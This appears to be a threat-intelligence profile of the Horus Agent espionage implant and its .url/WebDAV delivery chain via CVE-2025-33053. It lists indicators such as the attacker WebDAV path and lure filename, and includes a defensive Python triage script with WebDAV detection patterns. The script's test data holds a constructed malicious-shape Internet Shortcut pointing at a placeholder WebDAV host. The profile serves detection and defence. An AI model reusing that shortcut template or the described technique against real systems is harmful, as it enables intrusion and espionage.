Horus Agent
Horus Agent is a custom espionage implant used by Stealth Falcon (aka FruityArmor, G0038) and built to operate with the Mythic command-and-control framework. Reporting describes it as a private C++ Mythic agent and an evolution or rewrite of the group’s earlier customized Apollo implant used in 2022–2023. It was observed in a multi-stage intrusion chain in which Stealth Falcon exploited CVE-2025-33053, a Windows Internet Shortcut Files/WebDAV remote code execution zero-day, to target high-value organizations, including a major defense organization in Turkey, with broader targeting across government and defense entities in Turkey, Qatar, Egypt, and Yemen.
The infection chain used a phishing-delivered .url file disguised as a PDF, likely sent as an archived attachment. The shortcut abused Windows working-directory/search-order behavior and an attacker-controlled WebDAV server to cause legitimate Windows tooling such as iediagcmd.exe to execute a malicious remote route.exe. That binary installed Horus Loader, which cleaned up prior-stage artifacts, could present a decoy document, and then deployed Horus Agent.
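The delivery chain above turns on two observable artifacts: an Internet Shortcut whose WorkingDirectory points at a WebDAV share, and a legitimate Windows tool whose child process (or current directory) resolves to that share. The following triage helpers are an added example, not code from the original report or from Check Point: they parse the INI-style [InternetShortcut] body and Sysmon-style process-creation fields (Image, ParentImage, CurrentDirectory are assumed field names) and flag the WebDAV mini-redirector markers (@SSL, @port, DavWWWRoot). All sample shortcut text, host names and event records are constructed placeholders, and the "URL launches a local executable" rule is a heuristic assumption rather than a documented detail of the campaign.

```python
"""
Triage helpers for a .url-plus-WebDAV delivery chain. Added example; the
sample inputs are constructed and host names are placeholders.
"""
import configparser
import re

# Markers the Windows WebDAV mini-redirector leaves in UNC paths, e.g.
# \\host@SSL@443\DavWWWRoot\..., \\host@443\..., \\host\DavWWWRoot\...
WEBDAV_MARKER = re.compile(r"(@ssl(@\d+)?\\|@\d+\\|\\davwwwroot\\)", re.IGNORECASE)
UNC_PATH = re.compile(r"^\\\\[^\\]+\\")


def is_webdav_path(value: str) -> bool:
    """True for a UNC path that is served through the WebDAV redirector."""
    v = value.strip().strip('"').replace("/", "\\")
    # Trailing separator added so a path that ends in DavWWWRoot still matches.
    return bool(UNC_PATH.match(v)) and bool(WEBDAV_MARKER.search(v + "\\"))


def triage_url_shortcut(text: str) -> dict:
    """Parse a .url body and report fields that point at a WebDAV share.

    Heuristic (assumption): WorkingDirectory on a WebDAV share is the strongest
    signal; a URL= that starts a local executable instead of naming a web
    address is flagged alongside it because a real shortcut rarely does that.
    """
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text.lstrip())
    sec = cp["InternetShortcut"] if cp.has_section("InternetShortcut") else {}
    url = sec.get("url", "")
    wd = sec.get("workingdirectory", "")
    icon = sec.get("iconfile", "")
    findings = []
    if is_webdav_path(wd):
        findings.append("WorkingDirectory on WebDAV share")
    if is_webdav_path(icon):
        findings.append("IconFile on WebDAV share")
    if url.lower().startswith("file:") and url.lower().endswith(".exe"):
        findings.append("URL launches a local executable")
    return {
        "url": url,
        "working_directory": wd,
        "findings": findings,
        "suspicious": "WorkingDirectory on WebDAV share" in findings,
    }


def triage_process_event(event: dict) -> list:
    """Flag a process-creation record whose image or cwd lives on a WebDAV share."""
    image = event.get("Image", "")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cwd = event.get("CurrentDirectory", "")
    findings = []
    if is_webdav_path(image):
        findings.append("process image executed from WebDAV share")
    if is_webdav_path(cwd):
        findings.append("process current directory on WebDAV share")
    # iediagcmd.exe is the tool named in the reporting; any other hit stays flagged.
    if findings and parent == "iediagcmd.exe":
        findings.append("parent is iediagcmd.exe")
    return findings


# Constructed sample shortcut (placeholder host, not a real indicator).
SAMPLE_SHORTCUT = r"""
[InternetShortcut]
URL=file:///C:/Program Files/Internet Explorer/iediagcmd.exe
WorkingDirectory=\\webdav-placeholder.example@ssl@443\DavWWWRoot\stage
IconFile=C:\Windows\System32\shell32.dll
IconIndex=1
"""

BENIGN_SHORTCUT = "[InternetShortcut]\nURL=https://www.example.org/\n"

# Constructed process-creation records in Sysmon-style field names.
SAMPLE_EVENTS = [
    {
        "Image": r"\\webdav-placeholder.example@ssl@443\DavWWWRoot\stage\route.exe",
        "ParentImage": r"C:\Program Files\Internet Explorer\iediagcmd.exe",
        "CurrentDirectory": r"\\webdav-placeholder.example@ssl@443\DavWWWRoot\stage\ ",
    },
    {
        "Image": r"C:\Windows\System32\route.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CurrentDirectory": r"C:\Users\analyst\ ",
    },
]

if __name__ == "__main__":
    print(triage_url_shortcut(SAMPLE_SHORTCUT))
    print(triage_url_shortcut(BENIGN_SHORTCUT))
    for ev in SAMPLE_EVENTS:
        print(ev["Image"], "->", triage_process_event(ev))
```

The shortcut check is cheap enough to run on every .url attachment at the mail gateway; the process check is the same logic applied to endpoint telemetry, so a hit on either side corroborates the other.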
Horus Agent is described as focused on stealth, anti-analysis, and selective activation on valuable targets. Reported capabilities include command execution, system fingerprinting/reconnaissance, configuration changes, file and folder enumeration, file operations including download/upload, shellcode injection into running processes, and controlled exit. The malware polls a Mythic C2 server for instructions, and Stealth Falcon reportedly developed custom Mythic commands for stealth and flexibility. Anti-analysis and evasion features directly mentioned include code virtualization or a custom OLLVM implementation, string encryption, API hashing, and control-flow flattening. Researchers also noted that the newer Horus tooling is more advanced, evasive, and modular than prior Stealth Falcon Apollo-based tooling.
Associated tooling observed in the same campaign included a domain controller credential dumper used to extract Active Directory and credential-related files, a passive backdoor that listens for incoming requests and executes encrypted shellcode payloads, and a custom C++ keylogger that uses RC4 encryption. One reported keylogger IOC path was C:/windows/temp/~TN%LogName%.tmp. Additional infrastructure and execution artifacts mentioned in reporting include the lure filename "TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url", the attacker WebDAV path "\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr", and execution of a malicious route.exe from that remote share.
Vulnerabilities exploited
1 CVE correlated with this family across public research and vendor advisories.
The attack leveraged CVE-2025-33053, a remote code execution vulnerability that allows threat actors to manipulate the working directory of legitimate Windows tools to execute malicious files from attacker-controlled WebDAV servers. Microsoft released a security patch for this vulnerability as part of its June Patch Tuesday updates, following a responsible disclosure by Check Point Research.
The attack delivered a multi-stage infection chain, culminating in the deployment of “Horus Agent,” a custom-built implant for the Mythic command and control framework... Named after the Egyptian falcon-headed sky god, Horus Agent represents an evolution from the group’s previously used customized Apollo implant.
Groups observed using it
1 distinct threat actor attributed by public researchers: Stealth Falcon.
Techniques & procedures
10 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
The latest campaign from Stealth Falcon began with phishing emails. In one incident observed by Check Point, hackers targeted a Turkish defense organization...
Check Point uncovered the campaign after a victim uploaded the phishing email attachment to VirusTotal in March. On running the file, Check Point found the malicious file began to harvest diagnostic data and redirected the infected devices' WebDAV path to an attacker-controlled server.
Execution
1 technique
A sophisticated cyberattack campaign by the advanced persistent threat group, Stealth Falcon, which exploited a previously unknown zero-day vulnerability ... The attack leveraged CVE-2025-33053, a remote code execution vulnerability ...
Privilege Escalation
1 technique
Stealth
4 techniques
The malware employs advanced anti-analysis techniques, including code virtualization, string encryption, and API hashing, to evade detection.
This allowed arbitrary code execution through process hollowing, as the malicious route.exe, spawned from the WebDAV server, bypassed traditional signature-based defenses.
On execution, it cleaned up previous utilities to evade detection and then deployed a decoy document and the final Horus Agent payload.
Discovery
1 technique
The Horus Agent focuses on essential reconnaissance functions, allowing threat actors to fingerprint victim machines and assess their value before deploying more advanced payloads.
Command and Control
2 techniques
...the latest version of Horus Agent, a custom-built implant designed to operate with the Mythic C2 command-and-control framework.
Once the connection was established, a malicious file named route.exe executed from the attacker's WebDAV server that deployed the Horus loader.
Recent activity
10 sources tracked across advisories, community write-ups, and news.
Malware distributed by the Stealth Falcon APT via a remote code execution vulnerability in Internet Shortcut Files.
Horus Agent is malware deployed by the APT Stealth Falcon via exploitation of Internet Shortcut Files RCE vulnerabilities.
Custom backdoor implant for the Mythic C2 framework, used in targeted attacks with anti-analysis and counter-defensive features.
Custom implant used by Stealth Falcon, built on the Mythic C2 framework, designed for stealth, anti-analysis, and selective payload deployment in espionage operations.